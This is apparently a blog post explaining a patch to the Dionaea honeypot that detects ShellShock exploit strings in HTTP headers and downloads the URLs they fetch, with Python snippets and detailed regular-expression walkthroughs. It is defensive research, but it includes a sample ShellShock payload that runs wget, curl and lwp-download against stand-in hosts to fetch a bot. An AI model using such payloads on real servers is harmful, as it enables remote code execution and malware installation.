It’s been four months since the Bash ShellShock vulnerability was made public, and for some reason I hadn’t thought of modifying Dionaea to analyse and download any URLs in inbound ShellShock exploits until a week ago! If you’re interested in using Dionaea to download the URLs that in-the-wild ShellShock exploits are trying to download, or if you just like hairy regular expressions, then read on.
I was wading through my web server logs to see if I was getting hit with traffic originally destined for other Internet servers (as mentioned by the Internet Storm Center in one of their podcasts/diary entries), and noticed the familiar ‘() {‘ string in the User-Agent: (and in the occasional Referer:) header (a day after ShellShock was apparently made public — another example of why you should patch as soon as you can!).
I downloaded one of the URLs manually and found a Perl ‘Stealth Bot’. How did I know that it was a stealth bot? It said so in a nice big comment block, presumably just in case we didn’t think that it was stealthy.
So then I thought why not modify the Dionaea (honeypot software) HTTP module to look for the ShellShock exploit and attempt to download any URLs contained therein — that sounded like a good excuse for not doing the vacuuming, so I got started.
The HTTP module in Dionaea is implemented in ./modules/python/scripts/http.py in the source tree. I thought it best to create a new function which can be used to process the inbound HTTP headers, process_headers(). Now, not being overly familiar with Dionaea’s code, figuring out where to put the call to my new function was reminiscent of a game of pin the tail on the donkey.
Seeing (as, unlike pin the tail on the donkey, I wasn’t blindfolded) the httpreq class iterate through the headers and set elements in self.headers[], I thought that that seemed like a logical place to call my process_headers() function. That was until I needed to create an incident and get access to the connection object to pass to the incident object.
A more logical spot was where the httpreq object gets created, which is in the http::handle_io_in() function (which for some reason just made me think of “it’s get Kirsty in” from The Parole Officer movie). Looking at what handle_io_in() does also makes this seem like a logical spot to call process_headers(): it takes the inbound data, locates the end of the headers (eoh = data.find(b'\r\n\r\n')), creates the httpreq object, checks the HTTP method, and processes the request.
I’m going to break this into two sections at this point. The next section will discuss the Python code, and the section following will explain the regular expression that extracts the URLs from the ShellShock exploit string.
See dionaea-shellshock.diff: A Dionaea Patch to Download ShellShock URLs for my patch. If you want to download it and use it to patch the Dionaea source code, then you should download the base64 encoded version and decode it to ensure that you get a byte-for-byte copy.
The Python Code
If you check my patch, you’ll see that I added a call to my process_headers() function, self.process_headers() (see line 105), after handle_io_in() creates the httpreq object (self.header = httpreq(header)). That’s the only modification to the existing code. The rest is new code. Let’s have a look at it.
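For orientation, the modified part of handle_io_in() looks something like this (a simplified sketch rather than the verbatim patch; see the diff above for the real thing):

# Sketch of the patched section of http.handle_io_in(); the surrounding
# logic is simplified, and only the process_headers() call is new.
eoh = data.find(b'\r\n\r\n')        # locate the end of the HTTP headers
if eoh != -1:
    header = data[0:eoh]
    self.header = httpreq(header)   # parse the request line and headers
    self.process_headers()          # new: look for ShellShock exploit URLs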
The first thing the function does is obtain a copy of all of the headers returned by the httpreq object’s __init__() method, and then iterate through them using a for loop (lines 36 – 43). The calls to str() (lines 47 – 48) are necessary to convert arrays of bytes (which are just ASCII characters) to strings.
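In outline, that part of process_headers() looks like this (a simplified sketch; the attribute and variable names are illustrative, not the verbatim patch):

def process_headers(self):
    # Obtain a copy of the headers that httpreq's __init__() parsed out
    # of the request, then walk through them (sketch; names illustrative).
    headers = dict(self.header.headers)
    for hdr_name, hdr_value in headers.items():
        # The header names and values are arrays of bytes (all ASCII),
        # so convert them to strings for the re module to work on.
        name = str(hdr_name, 'ascii')
        value = str(hdr_value, 'ascii')
        # ... the two regular expression checks described below go here ...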
Now for the first regular expression (line 53). If there’s one thing I’ve learned about regular expressions over the years, it’s that it is an awfully good idea to document them! I’ve often gone back to regular expressions (even ones that I’ve written myself) a month or so later and had to spend ages figuring out what they do again. Also, regarding regular expressions, I refuse to use PCREs (most of the PCRE extensions are unnecessary or violate the regularity of the expression).
\(\) {[ <tab>][^}]*;[ <tab>]*}[ <tab>]*;
That is the first of our two regular expressions. It is used to determine whether a header value contains the ShellShock exploit. It looks for the ‘()’ followed by one space (I tried multiple spaces and the exploit doesn’t seem to work with more than one space here, for some reason) and a ‘{‘.
We then have a set of square brackets ([]) containing a space and a tab character, written as <tab> above because WordPress squeezes white space (grab a verbatim copy from the patch by decoding the base64 encoded version). What do you know: we can match white-space without using ‘\s’. Admittedly, I couldn’t find exactly which characters PCRE counts as white-space, so the two may not match the same set, but you can always add any other white-space characters to the []s, and this way it is obvious which characters are being matched without having to go and find what PCREs call ‘whitespace’.
Moving on. The expression then matches zero or more (*) characters ([]) that are not (^) ‘}’, followed by a ‘;’. Then come zero or more white-space characters ([ <tab>]*), a closing brace ‘}’, zero or more further white-space characters, and finally a semi-colon ‘;’.
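You can try the expression out on its own, too. Here’s a quick standalone test (with \t standing in for the literal tab character, and a made-up exploit string):

import re

# The ShellShock detection expression; \t stands in for the literal tab.
shellshock_re = re.compile(r'\(\) {[ \t][^}]*;[ \t]*}[ \t]*;')

# A made-up header value in the style of in-the-wild exploits.
ua = '() { :;}; /bin/bash -c "wget http://203.0.113.7/bot.pl"'

print(shellshock_re.search(ua))        # matches '() { :;};'
print(shellshock_re.search('Mozilla/5.0 (X11; Linux x86_64)'))  # None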
If this regular expression match succeeds, then we have a ShellShock exploit and we can go on to see if it contains a command to download a URL, which is where the second, and hairier, regular expression comes in (line 60).
(?:wget|curl|lwp-download)(?: |(?: [^;\"]* ))((?:(?:https?|ftp)://)?(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+(?:/[^ ;\\\"]*)*)
The code then uses a for … in … loop (line 66) to iterate through any URLs matched by the regular expression. The use of the ‘?:’ modifier stops the individual components of the URL from being included in the re match object as separate elements.
Instead the returned matches will be the text that matches the following part of the expression (because it is enclosed in a set of ()s that isn’t modified by a ‘?:’), which is the URL that the exploit is trying to download:
((?:(?:https?|ftp)://)?(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+(?:/[^ ;\\\"]*)*)
For each of the URLs extracted by the regular expression, we check to see if we’ve already created an incident for the URL (is the URL in the submittedurls array, line 70). This is because a number of exploits were including the same URL in both a wget and a curl command (presumably hedging their bets, as they didn’t know whether the host would have wget or curl installed). By checking that the URL isn’t in the submittedurls array, we make sure that we don’t create two download offer incidents for the same URL.
If this is a new URL (for this connection), then we create a Dionaea dionaea.download.offer incident (i = incident("dionaea.download.offer"), line 76), link it to the current connection (i.con = self), set the URL (i.url = dlurl), and pass it to Dionaea for processing (i.report()) (lines 81 – 87).
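Put together, the loop looks roughly like this (a condensed sketch of the patch: urlregex stands for the compiled second regular expression, value for the header value being checked, and I’ve used findall() for brevity):

# Condensed sketch of the URL-handling loop; see the patch for the
# verbatim code.
submittedurls = []
for dlurl in urlregex.findall(value):
    # Some exploits name the same URL in both a wget and a curl command;
    # only create one download offer per URL per connection.
    if dlurl in submittedurls:
        continue
    submittedurls.append(dlurl)
    i = incident("dionaea.download.offer")   # offer the URL to Dionaea
    i.con = self                             # link it to this connection
    i.url = dlurl
    i.report()                               # hand it over for processing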
Regular Expression Explanation
(?:wget|curl|lwp-download)(?: |(?: [^;\"]* ))((?:(?:https?|ftp)://)?(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+(?:/[^ ;\\\"]*)*)
Ok. This one may take some explaining! This regular expression kept growing as I noticed different formats for the wget and curl command lines (even an incorrect one where it looked like one exploit assumed that the ‘-O’ option did the same with curl as it did with wget), and then a URL that was missing the http:// from the beginning.
It might help if I explained some of the regular expression constructs first, then put them all together.
Parentheses, ‘()’, are used for grouping, much as they are in maths. They also cause any text matching the contained regular expression to be stored for later retrieval (unless the ‘?:’ modifier is used).
Note that the ‘?:’ modifier is something which I’m usually against using, as it is generally a pointless extension, but in this case it allows us to make subsequent Python code simpler, so we’ll put them in. The ‘?:’ modifier modifies the normal parenthesis behaviour of grouping by not storing the matching text for later retrieval.
This allows us to simplify the Python code because we don’t have to pluck particular elements out of the re match object, which in turn means that we can just use a ‘for … in …‘ construct, as the only elements in there will be the ones that we want.
The ‘|’ character is used to match alternatives. As an example, it is used at the beginning to find either wget, curl, or lwp-download.
‘[]’s match any of the characters contained within, unless the first character therein is a ‘^’ symbol, in which case the []s expression will match any characters not contained within. Within the square brackets, a hyphen (‘-‘) character specifies a range. If the hyphen character is the first (excluding the optional caret (‘^’) character) or last character, then it matches a literal hyphen.
‘*’ means to match zero or more occurrences of the previous character/group.
‘?’ (when it doesn’t immediately follow a ‘(‘ character) means to match zero or one occurrence of the previous character/group. When a ‘?’ immediately follows a ‘(‘ character (which makes the ‘zero or one occurrences of’ meaning nonsensical), it is invoking one of a number of extensions/modifiers.
‘+’ matches at least one occurrence of the previous character/group.
‘{m,n}’ matches m to n occurrences. In this case, I use it as ‘{2,}’ which matches at least two occurrences. This is the same as ‘(expression)(expression)+’, but saves you from having to repeat the expression. The latter method can be used if you find yourself using a regular expression engine that doesn’t support the ‘{m,n}’ construct — sed on Solaris springs to mind, or most things on Solaris for that matter.
Oh yeah, ‘.’ matches any (non-newline) character. ‘\’ escapes characters, that is, it revokes the special regular expression meaning and turns it into a literal character. For instance, ‘*’ by itself means zero or more occurrences of the previous character/group. If we stick a ‘\’ in front of it, it loses its magical powers and will match a literal ‘*’ character.
The same goes for a ‘\’, in that ‘\\’ will match a literal ‘\’. Often it can take some experimenting to determine the number of ‘\’ characters that you need as things like a shell, or Python interpreter, may also have special characters and use ‘\’ to escape them. You’ll often find that one level of escaping gets eaten up by an interpreter (and subsequent levels by any other interpreters that process the expression).
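A quick interpreter session makes the escaping levels concrete (plain Python here; a shell would add yet another level on top):

import re

# The regular expression engine needs to see two characters, \\, to
# match one literal backslash. In an ordinary Python string each of
# those backslashes must be escaped again, giving four in the source.
print(re.search('\\\\', 'a\\b'))    # matches the '\' in a\b
# A raw string stops Python consuming one level of escaping.
print(re.search(r'\\', 'a\\b'))     # the same match, easier to read
# Escaping a magic character turns it back into a literal.
print(re.search(r'\*', '2*3'))      # matches the literal '*'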
Right. We now know enough to determine what our second regular expression is doing. To make it easier, we’ll break it into parts.
(?:wget|curl|lwp-download)
This looks for a command that will download a URL, in this case wget, curl, or lwp-download. The ‘?:’ just inside the parentheses means that the match won’t be returned as a separate element in the re match object.
(?: |(?: [^;\"]* ))
This part matches the text in between the command (wget, curl, or lwp-download) and the URL. It says that we want to match either a single space (this probably isn’t as generic as it should be; a [ <tab>]+ construct would allow for a varying amount of white-space), or a space, a (possibly empty) run of characters that aren’t ‘;’ or ‘"’, and another space.
I put a bit of thought into this, as I was trying to do it with one expression rather than the two alternatives, but I couldn’t think of a single expression that would prevent the following two problems.
If you leave the single space alternative out, then there will have to be two spaces in a row if there aren’t any options or other text in between the command and the URL (as per the second alternative in that regular expression snippet).
If you attempt to solve this problem by making the first of those spaces (in the second alternative expression) optional, then it will match a command that starts with ‘wget‘, ‘curl‘, or ‘lwp-download‘, like ‘curling’ for instance.
If you make the second of the spaces optional, then the URL could just happen to be part of another string, or a non-http/non-ftp URL. Take myhttps://subdirectory.with.dots/file for instance, which could be a reference to the file ‘file’ in the directory ‘subdirectory.with.dots’ on an NFS server called ‘myhttps’ (yes, NFS references usually have just a single ‘/’ to specify the root directory of the server, but a ‘//’ will work), given to wget -O as the name of a file to write the downloaded data to. Granted, reasonably unlikely, but still possible.
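If you want to see the first problem for yourself, here’s a quick test (a sketch using just the command and separator parts, plus the URL part described below):

import re

cmd = r'(?:wget|curl|lwp-download)'
url = r'((?:(?:https?|ftp)://)?(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+(?:/[^ ;\\"]*)*)'
text = 'curling is a sport, see www.curling.example.org'

# As written: no match, because 'curl' must be followed by a space.
print(re.findall(cmd + r'(?: |(?: [^;"]* ))' + url, text))   # []
# First space made optional: 'curl' inside 'curling' anchors a match.
print(re.findall(cmd + r'(?: |(?: ?[^;"]* ))' + url, text))  # ['www.curling.example.org']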
The rest of the expression is enclosed in parentheses, without a ‘?:’. That’s because the rest of the expression is the actual URL, which we want returned in the re match object. Let’s break it down:
(?:(?:https?|ftp)://)?
This part matches the protocol and ‘://’ part of the URL, and the trailing ‘?’ makes it optional (I saw one exploit that was missing the http:// at the start of the URL). Again, the two ‘?:’ constructs are there so that we don’t get the protocol part (http:// and http, say) returned by itself as a separate element in the re match object.
The ‘?’ after https says that the trailing ‘s’ is optional, that is, match either http or https.
(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+
This matches at least one (+) alphanumeric character ([0-9A-Za-z]) followed by a ‘.’ character (\.), repeated at least twice ({2,}), and followed by at least one alphanumeric character. Note that the ‘.’ has to be escaped, as a ‘.’ in a regular expression will match any non-newline character, but we want to match a literal ‘.’ character.
I’m not as happy with this part as I’d like to be. Since the protocol part of the URL is optional, we need to make sure that we’re not just matching a file name (to save the downloaded URL to) here. This is a problem with commands like ‘wget -O filename.ext missingprotocol.domain.tld’, in that we need the regular expression to match the server name rather than the file name.
The way I’ve stopped it matching a file name is to say that there must be at least two ‘.’ characters in the URL. Obviously this is prone to mismatches, as the output file could be called filename.ext.gz for instance. It also won’t match server names that only have one ‘.’ in them, like csiro.au.
The problem is, I found commands that have the output file name before URL, and some that have the URL before the output file name, so to fix this problem will mean doing checks of options and the like which will make the regular expression somewhat more complicated (especially with options like ‘-O’, which have a different meaning between wget and curl).
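Both failure modes are easy to reproduce with just the server-name part of the expression:

import re

# Just the server-name part: at least two 'label.' groups, then a label.
hostpart = re.compile(r'(?:[0-9A-Za-z]+\.){2,}[0-9A-Za-z]+')

print(hostpart.search('filename.ext.gz'))   # false positive: matches
print(hostpart.search('csiro.au'))          # false negative: None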
(?:/[^ ;\\\"]*)*
Finally, match (but don’t store (?:) as a separate entity) any path that may follow the server name. The path starts with a ‘/’, and consists of a string of characters that aren’t a space, ‘;’, ‘\’, or ‘"’.
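And here’s the whole expression in a standalone test against a made-up exploit string (the host is from an address range reserved for documentation; note the duplicate URL that the submittedurls check exists to filter out):

import re

urlregex = re.compile(
    r'(?:wget|curl|lwp-download)(?: |(?: [^;"]* ))'
    r'((?:(?:https?|ftp)://)?(?:[0-9A-Za-z]+\.){2,}'
    r'[0-9A-Za-z]+(?:/[^ ;\\"]*)*)')

# A made-up exploit in the style of those seen in the wild: the same URL
# given to both wget and curl, and one URL missing its http:// prefix.
value = ('() { :;}; /bin/bash -c "wget http://203.0.113.7/bot.pl; '
         'curl -o /tmp/b http://203.0.113.7/bot.pl; '
         'lwp-download evil.example.com/bot.pl"')

print(urlregex.findall(value))
# ['http://203.0.113.7/bot.pl', 'http://203.0.113.7/bot.pl',
#  'evil.example.com/bot.pl']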
Conclusion
So there you go. Ironically, since modifying my Dionaea honeypot to capture downloads from ShellShock exploits, I haven’t seen a ShellShock exploit hit my server! The last one was back on the 19th, so while I’ve tested my Dionaea code by manually connecting to Dionaea on port 80/tcp and sending an HTTP request with a ShellShock exploit in one of the headers, it hasn’t actually been hit by a ShellShock exploit in its natural environment.
I just did another check to find that one hit my web server about forty minutes ago, but for some reason it didn’t target my honeypot, so it still hasn’t been tested by a real in-the-wild ShellShock exploit.